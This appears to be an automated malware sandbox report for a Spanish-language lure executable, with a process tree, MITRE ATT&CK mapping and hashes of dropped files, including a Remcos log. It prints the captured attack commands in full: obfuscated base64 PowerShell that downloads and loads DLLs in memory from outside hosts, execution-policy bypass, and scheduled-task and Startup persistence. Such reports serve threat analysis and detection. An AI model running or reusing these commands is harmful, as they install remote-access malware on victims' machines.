  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:4252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:1
  2⤵
  PID:2316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5932 /prefetch:1
  2⤵
  PID:704
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:1
  2⤵
  PID:224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
  2⤵
  PID:508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
  2⤵
  PID:3628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1
  2⤵
  PID:3596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
  2⤵
  PID:3712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
  2⤵
  PID:4352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=7064 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:3696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --service-sandbox-type=service --mojo-platform-channel-handle=3920 /prefetch:8
  2⤵
  PID:5356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1288 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=3068 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:4032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=5608 /prefetch:8
  2⤵
  PID:5292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6788 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:5824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
  2⤵
  PID:2964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1844 /prefetch:1
  2⤵
  PID:6096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,17274740244044611795,11019561064516038062,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
  2⤵
  PID:4744

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1632

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4264

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:848

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap31052:128:7zEvent7589
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6116

C:\Users\Admin\Downloads\Libro Y Registro Radicado Nª43197.exe
"C:\Users\Admin\Downloads\Libro Y Registro Radicado Nª43197.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2332
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:5916
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\5200515062605.vbs"
    3⤵
    PID:5988
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwA4BDAEMgRBBDUEQQQnADsAWwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAHMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADkAMQAuADIAMQAzAC4ANQAwAC4ANwA0AC8ARwBSAEUARQBOAC8AUgBYAC8AbgB1AGUAdgBhAGQAbABsAC4AdAB4AHQAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBOAHcAZwBvAHgATQAuAEsAUABKAGEATgBqACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBQAFUAbABHAEsAQQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwAmADUAMwBjADcAMQBmAGUAOAA4ADMAMAA3ADAAOAAyADQAMgBkAGUAYQBjADYANgA4ADYAOAAyADUANwA2ADIAMgA2ADkAYQAwAGEAMQA5ADkAZQA2ADMAYQBjAGUAOQAxAGMAMgBhADQAZgA4ADUANwBiADAANABjADAANQBhADkAPQBtAGgAJgA2ADcAYQBiADgAZAA1ADYAPQBzAGkAJgA2ADcAZgAyAGIAZQA1ADYAPQB4AGUAPwB0AHgAdAAuADQAMgAyADkAOABOAC8AMAA1ADIAMAA1ADAAOQAzADAAMgA0ADAAMAAxADYAMAAxADIAMQAvADMANwAzADkANwAyADMANgA5ADEAMwA0ADYAMQAyADQANAA5AC8AcwB0AG4AZQBtAGgAYwBhAHQAdABhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwAHQAdABoACcAIAAsACAAJABSAG8AZABhAEMAbwBwAHkAIAAsACAAJwBIAEQAZABCAFMAVgBhAG4AVgBEAGEAJwAsACAAJwAzACcALAAgACcAMQAnACwAIAAnADAAMAA1ADQANAAwADAAMAA1ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('TNNjUG','Y') ) );$OWjuxD = $OWjuxD.replace('иавсес', 'C:\Users\Admin\AppData\Roaming\5200515062605.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
      4⤵
      PID:404
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Roaming\5200515062605.vbs';[Byte[]] $DLL = [system.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.213.50.74/GREEN/RX/nuevadll.txt'));[system.AppDomain]::CurrentDomain.Load($DLL).GetType('NwgoxM.KPJaNj').GetMethod('PUlGKA').Invoke($null, [object[]] ('&53c71fe8830708242deac6686825762269a0a199e63ace91c2a4f857b04c05a9=mh&67ab8d56=si&67f2be56=xe?txt.42298N/0520509302400160121/373972369134612449/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $RodaCopy , 'HDdBSVanVDa', '3', '1', '005440005' ))"
        5⤵
        
        PID:2916
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c schtasks.exe /create /tn "005440005" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HDdBSVanVDa.vbs'" /sc minute /mo 1 /f & exit
        6⤵
        
        PID:4772
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /create /tn "005440005" /tr "wscript.exe //b //nologo 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HDdBSVanVDa.vbs'" /sc minute /mo 1 /f
        7⤵
        Creates scheduled task(s)
        
        PID:3476
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4752
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\00000000000019810.vbs"
    3⤵
    PID:5924
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $dgUdYL = 'J▒Bm▒HY▒Z▒B1▒Gg▒I▒▒9▒C▒▒Jw▒w▒DM▒Jw▒7▒CQ▒eQB6▒GU▒egBj▒C▒▒PQ▒g▒Cc▒JQBw▒Ho▒QQBj▒E8▒ZwBJ▒G4▒TQBy▒CU▒Jw▒7▒Fs▒QgB5▒HQ▒ZQBb▒F0▒XQ▒g▒CQ▒ZwBu▒HI▒a▒Bk▒C▒▒PQ▒g▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBD▒G8▒bgB2▒GU▒cgB0▒F0▒Og▒6▒EY▒cgBv▒G0▒QgBh▒HM▒ZQ▒2▒DQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒g▒Cg▒TgBl▒Hc▒LQBP▒GI▒agBl▒GM▒d▒▒g▒E4▒ZQB0▒C4▒VwBl▒GI▒QwBs▒Gk▒ZQBu▒HQ▒KQ▒u▒EQ▒bwB3▒G4▒b▒Bv▒GE▒Z▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒d▒Bl▒Hg▒d▒Bi▒Gk▒bg▒u▒G4▒ZQB0▒C8▒cgBh▒Hc▒LwBl▒Ho▒agBt▒G8▒ZgB6▒DM▒cw▒2▒Cc▒KQ▒g▒Ck▒I▒▒p▒Ds▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EE▒c▒Bw▒EQ▒bwBt▒GE▒aQBu▒F0▒Og▒6▒EM▒dQBy▒HI▒ZQBu▒HQ▒R▒Bv▒G0▒YQBp▒G4▒LgBM▒G8▒YQBk▒Cg▒J▒Bn▒G4▒cgBo▒GQ▒KQ▒u▒Ec▒ZQB0▒FQ▒eQBw▒GU▒K▒▒n▒E0▒YQBy▒GE▒YwBh▒Gk▒YgBv▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒E0▒cwBx▒EI▒SQBi▒Fk▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒d▒B4▒HQ▒LgBv▒Ec▒aQBN▒GE▒VwBF▒E4▒LwBk▒HY▒LwBt▒G8▒Yw▒u▒Gw▒NQ▒z▒DI▒OQ▒5▒DE▒Mg▒0▒DU▒Lw▒v▒Do▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒eQB6▒GU▒egBj▒C▒▒L▒▒g▒Cc▒bgBq▒HY▒ZQBy▒GQ▒Jw▒s▒C▒▒J▒Bm▒HY▒Z▒B1▒Gg▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $dgUdYL.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Roaming\00000000000019810.vbs');powershell -command $KByHL;
      4⤵
      PID:2296
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$fvduh = '03';$yzezc = 'C:\Users\Admin\AppData\Roaming\00000000000019810.vbs';[Byte[]] $gnrhd = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://textbin.net/raw/ezjmofz3s6') ) );[system.AppDomain]::CurrentDomain.Load($gnrhd).GetType('Maracaibo.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('txt.oGiMaWEN/dv/moc.l532991245//:ptth' , $yzezc , 'njverd', $fvduh, '1', 'Roda' ));"
        5⤵
        
        PID:5756
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Roaming\00000000000019810.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        6⤵
        
        PID:5556
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        6⤵
        
        PID:1400
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\AppDate"
  2⤵
  PID:3940
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\AppDate\AppDate.exe'" /f
  2⤵
  PID:4944
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\AppDate\AppDate.exe'" /f
    3⤵
    - Creates scheduled task(s)
    PID:4260
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c copy "C:\Users\Admin\Downloads\Libro Y Registro Radicado Nª43197.exe" "C:\Users\Admin\AppData\Roaming\AppDate\AppDate.exe"
  2⤵
  PID:5012

C:\Users\Admin\Downloads\Libro Y Registro Radicado Nª43197.exe
"C:\Users\Admin\Downloads\Libro Y Registro Radicado Nª43197.exe"
1⤵
PID:5128
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  PID:668
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\AppDate"
  2⤵
  PID:2232
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\AppDate\AppDate.exe'" /f
  2⤵
  PID:464
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 10 /tn "Nano" /tr "'C:\Users\Admin\AppData\Roaming\AppDate\AppDate.exe'" /f
    3⤵
    - Creates scheduled task(s)
    PID:216
- C:\Windows\SysWOW64\cmd.exe
  "cmd" /c copy "C:\Users\Admin\Downloads\Libro Y Registro Radicado Nª43197.exe" "C:\Users\Admin\AppData\Roaming\AppDate\AppDate.exe"
  2⤵
  PID:4912

C:\Windows\system32\wscript.exe
wscript.exe //b //nologo "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HDdBSVanVDa.vbs"
1⤵
PID:5064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwA4BDAEMgRBBDUEQQQnADsAWwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAHMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADkAMQAuADIAMQAzAC4ANQAwAC4ANwA0AC8ARwBSAEUARQBOAC8AUgBYAC8AbgB1AGUAdgBhAGQAbABsAC4AdAB4AHQAJwApACkAOwBbAHMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBOAHcAZwBvAHgATQAuAEsAUABKAGEATgBqACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBQAFUAbABHAEsAQQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwAmADUAMwBjADcAMQBmAGUAOAA4ADMAMAA3ADAAOAAyADQAMgBkAGUAYQBjADYANgA4ADYAOAAyADUANwA2ADIAMgA2ADkAYQAwAGEAMQA5ADkAZQA2ADMAYQBjAGUAOQAxAGMAMgBhADQAZgA4ADUANwBiADAANABjADAANQBhADkAPQBtAGgAJgA2ADcAYQBiADgAZAA1ADYAPQBzAGkAJgA2ADcAZgAyAGIAZQA1ADYAPQB4AGUAPwB0AHgAdAAuADQAMgAyADkAOABOAC8AMAA1ADIAMAA1ADAAOQAzADAAMgA0ADAAMAAxADYAMAAxADIAMQAvADMANwAzADkANwAyADMANgA5ADEAMwA0ADYAMQAyADQANAA5AC8AcwB0AG4AZQBtAGgAYwBhAHQAdABhAC8AbQBvAGMALgBwAHAAYQBkAHIAbwBjAHMAaQBkAC4AbgBkAGMALwAvADoAcwBwAHQAdABoACcAIAAsACAAJABSAG8AZABhAEMAbwBwAHkAIAAsACAAJwBIAEQAZABCAFMAVgBhAG4AVgBEAGEAJwAsACAAJwAzACcALAAgACcAMQAnACwAIAAnADAAMAA1ADQANAAwADAAMAA1ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('TNNjUG','Y') ) );$OWjuxD = $OWjuxD.replace('иавсес', 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HDdBSVanVDa.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
  2⤵
  PID:376

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
494B

MD5
f1bc102dd0cd78b470fa27f80fe7b8bd

SHA1
0aa701a1a7ed5c630789c104d0504affd1eec9ab

SHA256
db87c613ae6e7f93e7beba27b35625e9ac37ab4aac43567c21b8bfcabc8219f0

SHA512
b1473f1913f74cd0012778853ef49117fe377feddcb98732e760262c405bf505ac251d284703ff0dc81961a48c58b094ec74eb8d5a4a1378a82541e3813eefd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Libro Y Registro Radicado Nª43197.exe.log

Filesize
520B

MD5
03febbff58da1d3318c31657d89c8542

SHA1
c9e017bd9d0a4fe533795b227c855935d86c2092

SHA256
5164770a37b199a79ccd23b399bb3309228973d9f74c589bc2623dc613b37ac4

SHA512
3750c372bbca1892e9c1b34681d592c693e725a8b149c3d6938079cd467628cec42c4293b0d886b57a786abf45f5e7229247b3445001774e3e793ff5a3accfa3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
545145bd63005959b3571fc66154db56

SHA1
4d5b872ba37cd364b24b9feff3a5649eae4cb6e7

SHA256
fd899e50134789747d3aa854a12f5f026bab6d3421eb8103b51843c999d4a57d

SHA512
de5416f989b7bf525997b984b14ff0265f941be01925d03d753ec04207df3a97bc09f5516c2f19be2dc30704591bfc7d87d0b0e45cf3f3401ffd89c47d728e8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fd7944a4ff1be37517983ffaf5700b11

SHA1
c4287796d78e00969af85b7e16a2d04230961240

SHA256
b54b41e7ce5600bc653aa7c88abb666976872b2d5e2d657bfc1147a0b49e9d74

SHA512
28c58a2ccf39963a8d9f67ea5b93dbccf70b0109b2c8a396a58389cdec9db1205523a95730485bcbc9d533867cbf0e7167ad370fd45740e23656d01d96ee543b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a774512b00820b61a51258335097b2c9

SHA1
38c28d1ea3907a1af6c0443255ab610dd9285095

SHA256
01946a2d65e59b66ebc256470ff4861f32edee90a44e31bf67529add95cafef4

SHA512
ce109be65060a5e7a872707c6c2ccce3aacd577e59c59d6e23e78d03e3d502f2707713fda40a546ed332e41a56ef90297af99590a5ab02f686a58bcbf3a82da1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

Filesize
24KB

MD5
b82ca47ee5d42100e589bdd94e57936e

SHA1
0dad0cd7d0472248b9b409b02122d13bab513b4c

SHA256
d3c59060e591b3839ec59cad150c0a38a2a2a6ba4cc4dc5530f68be54f14ef1d

SHA512
58840a773a3a6cb0913e6a542934daecaef9c0eeab626446a29a70cd6d063fdb012229ff2ccfa283e3c05bc2a91a7cac331293965264715bdb9020f162dc7383

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

Filesize
196KB

MD5
610101739894067f9931440ffe43ac4f

SHA1
102c9e204cbd6d9d0e4068b76dbe279ce159627b

SHA256
4edc1163f200a4d58d7ab60a3a24e107f6349db5e911ed33ed5b4ba7e5a7b0db

SHA512
d1ba3c546b65e259f4ab5efc21f7046ed483f2c25d1d5c10d18f8066b968cbcf72d6c7a9b1ffc4a65413c3ef36a36698ef79d5fa6bacd2542be8aa91e6a621a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
ce91e5ba3ee78b150926adef10fb93bd

SHA1
dadc94645633a76a801a31e928532bd6c83ca38c

SHA256
e08cbb26eef59b9aaa6ac8e60a14ac81e4110c6ced7c68a2ffab3519cc9046c4

SHA512
1e447adc7d5ef924ab293c038df1100b29ec719579c8ff3bad022a8b50c85b33c157974e45f391a31274926b825312b2c66e62e8aa17124e067e1495a37cf111

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
480B

MD5
3d54685f9ff1879f21db7d614619e320

SHA1
2811a2f2477797e0d063b47abbd5e39691f02776

SHA256
dd0842185bbd497a6514b06c18f4053c0e3fdc1ad45f04f1ea0f1de6f91edd27

SHA512
